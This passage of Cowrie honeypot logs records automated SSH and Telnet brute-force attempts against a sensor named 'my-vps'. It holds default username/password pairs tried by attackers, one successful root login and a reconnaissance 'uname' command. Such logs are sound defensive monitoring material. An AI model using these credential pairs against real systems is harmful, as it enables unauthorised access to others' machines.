hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:33.916626Z","src_ip":"212.227.125.160","session":"6047cd6fb1d0"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:59:34.234695Z","src_ip":"212.227.125.160","session":"6047cd6fb1d0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:35.342314Z","src_ip":"212.227.125.160","session":"6047cd6fb1d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53062,"dst_ip":"1.2.3.4","dst_port":22,"session":"627079d99626","protocol":"ssh","message":"New connection: 212.227.235.229:53062 (1.2.3.4:22) [session: 627079d99626]","sensor":"my-vps","timestamp":"2025-08-28T05:59:41.297642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:41.298913Z","src_ip":"212.227.235.229","session":"627079d99626"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:41.444130Z","src_ip":"212.227.235.229","session":"627079d99626"}
{"eventid":"cowrie.session.closed","duration":33.4615740776062,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:41.465992Z","src_ip":"8.222.212.69","session":"8cbd18cf9f4d"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:59:41.881411Z","src_ip":"212.227.235.229","session":"627079d99626"}
{"eventid":"cowrie.session.closed","duration":31.49007534980774,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:42.543509Z","src_ip":"8.222.212.69","session":"95247cd5fe21"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:43.028823Z","src_ip":"212.227.235.229","session":"627079d99626"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45138,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6315a2cbf74","protocol":"ssh","message":"New connection: 212.227.235.229:45138 (1.2.3.4:22) [session: c6315a2cbf74]","sensor":"my-vps","timestamp":"2025-08-28T05:59:53.011551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:59:53.012576Z","src_ip":"212.227.235.229","session":"c6315a2cbf74"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:59:53.156514Z","src_ip":"212.227.235.229","session":"c6315a2cbf74"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:59:53.591581Z","src_ip":"212.227.235.229","session":"c6315a2cbf74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:59:53.968746Z","src_ip":"212.227.235.229","session":"c6315a2cbf74"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:59:53.969542Z","src_ip":"212.227.235.229","session":"c6315a2cbf74"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:54.114707Z","src_ip":"212.227.235.229","session":"c6315a2cbf74"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:59:54.115834Z","src_ip":"212.227.235.229","session":"c6315a2cbf74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57197,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c1950cd3c27","protocol":"telnet","message":"New connection: 212.227.235.229:57197 (1.2.3.4:23) [session: 5c1950cd3c27]","sensor":"my-vps","timestamp":"2025-08-28T06:00:02.094478Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44572,"dst_ip":"1.2.3.4","dst_port":22,"session":"511981a8ac5b","protocol":"ssh","message":"New connection: 212.227.235.229:44572 (1.2.3.4:22) [session: 511981a8ac5b]","sensor":"my-vps","timestamp":"2025-08-28T06:00:07.900095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:00:07.900913Z","src_ip":"212.227.235.229","session":"511981a8ac5b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:00:08.044117Z","src_ip":"212.227.235.229","session":"511981a8ac5b"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:00:08.475481Z","src_ip":"212.227.235.229","session":"511981a8ac5b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:00:09.620746Z","src_ip":"212.227.235.229","session":"511981a8ac5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40904,"dst_ip":"1.2.3.4","dst_port":22,"session":"14600f2301c4","protocol":"ssh","message":"New connection: 212.227.125.160:40904 (1.2.3.4:22) [session: 14600f2301c4]","sensor":"my-vps","timestamp":"2025-08-28T06:00:15.444321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:00:15.460562Z","src_ip":"212.227.125.160","session":"14600f2301c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:00:15.551207Z","src_ip":"212.227.125.160","session":"14600f2301c4"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T06:00:15.964044Z","src_ip":"212.227.125.160","session":"14600f2301c4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:00:17.070134Z","src_ip":"212.227.125.160","session":"14600f2301c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38934,"dst_ip":"1.2.3.4","dst_port":22,"session":"9197512812a9","protocol":"ssh","message":"New connection: 212.227.235.229:38934 (1.2.3.4:22) [session: 9197512812a9]","sensor":"my-vps","timestamp":"2025-08-28T06:00:23.794649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:00:23.800936Z","src_ip":"212.227.235.229","session":"9197512812a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:00:23.941900Z","src_ip":"212.227.235.229","session":"9197512812a9"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T06:00:24.530351Z","src_ip":"212.227.235.229","session":"9197512812a9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:00:25.677248Z","src_ip":"212.227.235.229","session":"9197512812a9"}
{"eventid":"cowrie.session.closed","duration":31.7181134223938,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:00:33.812482Z","src_ip":"212.227.235.229","session":"5c1950cd3c27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37526,"dst_ip":"1.2.3.4","dst_port":22,"session":"06b6fc1a6ba2","protocol":"ssh","message":"New connection: 212.227.125.160:37526 (1.2.3.4:22) [session: 06b6fc1a6ba2]","sensor":"my-vps","timestamp":"2025-08-28T06:00:37.293874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:00:37.294653Z","src_ip":"212.227.125.160","session":"06b6fc1a6ba2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:00:37.398393Z","src_ip":"212.227.125.160","session":"06b6fc1a6ba2"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T06:00:37.711329Z","src_ip":"212.227.125.160","session":"06b6fc1a6ba2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:00:38.817726Z","src_ip":"212.227.125.160","session":"06b6fc1a6ba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46936,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7e68063aed5","protocol":"ssh","message":"New connection: 212.227.235.229:46936 (1.2.3.4:22) [session: a7e68063aed5]","sensor":"my-vps","timestamp":"2025-08-28T06:00:40.433833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:00:40.435081Z","src_ip":"212.227.235.229","session":"a7e68063aed5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:00:40.578151Z","src_ip":"212.227.235.229","session":"a7e68063aed5"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T06:00:41.154927Z","src_ip":"212.227.235.229","session":"a7e68063aed5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:00:42.301336Z","src_ip":"212.227.235.229","session":"a7e68063aed5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57030,"dst_ip":"1.2.3.4","dst_port":22,"session":"60bfcbc09f9a","protocol":"ssh","message":"New connection: 212.227.125.160:57030 (1.2.3.4:22) [session: 60bfcbc09f9a]","sensor":"my-vps","timestamp":"2025-08-28T06:01:00.335843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:01:00.341458Z","src_ip":"212.227.125.160","session":"60bfcbc09f9a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:01:00.445582Z","src_ip":"212.227.125.160","session":"60bfcbc09f9a"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:01:00.862522Z","src_ip":"212.227.125.160","session":"60bfcbc09f9a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:01.971127Z","src_ip":"212.227.125.160","session":"60bfcbc09f9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55280,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d36a3c994e2","protocol":"ssh","message":"New connection: 212.227.125.160:55280 (1.2.3.4:22) [session: 1d36a3c994e2]","sensor":"my-vps","timestamp":"2025-08-28T06:01:15.438521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:01:15.439439Z","src_ip":"212.227.125.160","session":"1d36a3c994e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:01:15.542846Z","src_ip":"212.227.125.160","session":"1d36a3c994e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54916,"dst_ip":"1.2.3.4","dst_port":22,"session":"a11180d6dd41","protocol":"ssh","message":"New connection: 212.227.125.160:54916 (1.2.3.4:22) [session: a11180d6dd41]","sensor":"my-vps","timestamp":"2025-08-28T06:01:15.724120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:01:15.724882Z","src_ip":"212.227.125.160","session":"a11180d6dd41"}
